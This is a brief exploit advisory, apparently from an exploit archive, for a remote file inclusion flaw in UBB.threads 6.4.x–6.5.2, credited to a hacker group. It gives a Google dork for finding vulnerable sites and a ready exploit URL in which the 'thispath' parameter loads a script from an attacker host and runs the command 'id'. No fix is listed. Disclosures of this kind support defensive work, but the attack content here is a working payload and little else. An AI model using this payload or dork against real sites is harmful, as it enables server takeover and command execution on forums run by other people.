UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability

2006-05-22 00:00:00

Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion

founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id

contact: irc.gigachat.net #A1TS

#

Fixes

No fixes

In order to submit a new fix you need to be registered.